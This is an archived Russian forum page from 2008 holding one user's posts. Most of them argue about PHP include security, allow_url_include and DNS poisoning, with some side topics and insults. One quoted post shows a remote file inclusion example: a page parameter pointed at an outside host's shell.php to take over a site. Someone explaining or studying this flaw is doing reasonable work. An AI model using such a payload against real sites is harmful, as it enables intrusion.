Васисуалий

Васисуалий
Рейтинг
215
Регистрация
23.10.2008
A1Agregator:
Спасибо, мы разберемся. Это не наш партнер, но данные передадим.

Если честно эти ребятки с префиксом XX уже надоели своим спамом.

Boris A Dolgov:
Не надо психовать, все будет хорошо :)
Как уже выше неоднократно отписали
1) основная проблема в строке <?php include($_GET['page']); ?>
2) можно подменить dns у example.com.
3) если Вы не поняли смысла предыдущего пункта, учите не только "php for dummies", а еще "linux for dummies"
4) я на 100% уверен, что у Андрейки намного больше опыта и знаний, нежели чем у Вас. Это видно хотя бы по Вашим постам.

С чего ты, Боря, взял что я не понял смысла пункта 2. Только в серверную тоже можно прийти и скрипт поломать. Вероятность примерно на том же уровне, что и dns poisoning.

Строку <?php include($_GET['page']); ?> в нашем споре никто не разбирал, речь шла только <?php include("http://example.com/includes/example_include.php"); ?>

Это вы уже сейчас на неё слились, когда подумали немного мозгом, а не одним местом.

Ну и блажен кто верует. Вы там не из одной секты случаем?

LEOnidUKG:
Andreyka, Васисуалий
Не те примеры Вы даёте.

Опасность есть в том, что если программист пишет сайт и у него например:

index.php?page=news.php

в коде index.php идёт строка:

$page=$_GET['page'];
include('$page');

то злоумышленник просто может сделать так:

index.php?page=http://site.ru/shell.php

тем самым получит доступ к вашему сайту.

ЭТОТ пример итак понятен, и суть уязвимости ЭТОГО кода тоже.

НО Андрейка утверждает, что уязвимость есть именно в этом коде.

<?php include("http://example.com/includes/example_include.php"); ?>

Дауну Boris A Dolgov, который также считает (отписавшись мне в репу), что в ЭТОЙ строке кода есть уязвимость - срочно лечить голову и покупать учебник по PHP

Васисуалий добавил 21.11.2008 в 20:41

Andreyka:
Тем, что example.com можно поменять на нужный ip и сделать включение иного кода, чем ожидалось
Про то, что dns можно отравить и заставить отдать не тот ip, что ожидалось, Васисуалий конечно же незнает

Может ещё напишешь про то, что можно прийти с молотком в серверную и поломать скрипт?

barabaka:
он для меня практически решающий в выборе агрегатора.

Выбирай другого и не ипи моск бедному А1 😂😂

Мы уважаем своих конкурентов и, конечно же, войну никому не объявляли. Все дело в том, что в алгоритм склейки зеркал закралась ошибка, в результате которой домены google.com и google.ru были сгруппированы с данным сайтом. Ошибка уже устранена, справедливость восстановлена. Спасибо за бдительность

Ростислав Шоргин, Яндекс.Поиск

Как разобраться с ошибкой, связанной с крупным сайтом - так реакция моментальная. А как с обычным сайтом - так жди стандартных отписок Платона.

Andreyka:
Васисуалий, а почему сразу не /16 ?

Я вижу тебя специально учили в школе идиотов задавать идиотские вопросы.

Потому что я так решил. Я предпочитаю. Никого не заставляю и не даю рекомендаций.

Andreyka:
Васисуалий, неужели нужно рассказывать в чем уязвимость allow_url_include ???

Не нужно рассказы рассказывать. Вот конкретно строчка кода.

<?php include("http://example.com/includes/example_include.php"); ?>

показывай где в ЭТОЙ строке кода уязвимость. Не разбираешься - нечего умничать.

Васисуалий добавил 21.11.2008 в 14:02

LineHost:

Открывать allow_url_fopen, можно в том случае, если сажать каждого пользователя в "jail" по всем правилам, но это сложно и теряется производительность. В "jail"e.

Открывать его можно в том случае, если у программиста прямые руки, и он не похож на ламера Andreyka , а реально умеет разбираться в коде. Тогда можно.

manman:
"mod_dosevasive " угу, защищать апача апачем это круто:)
он на одном пересчитывании правил сдохнет еще до того,как кого-нибудь заблокирует.

если не знаешь как работает, не надо пукать в лужу. mod заносит правила в ipfw автоматом, причём я предпочитаю банить подсетями по /24

Andreyka, ты давай не в репу пиши, а конкретно покажи, где тут уязвимость.

В PHP вообще не разбираешься, а ещё умничать пытаешься.

LineHost:
allow_url_fopen off
Програмистам надо руки поотрубать от плечей за:
<?php include("http://example.com/includes/example_include.php"); ?>

Кончай ерунду писать. Здесь нет уязвимости.

Всего: 2049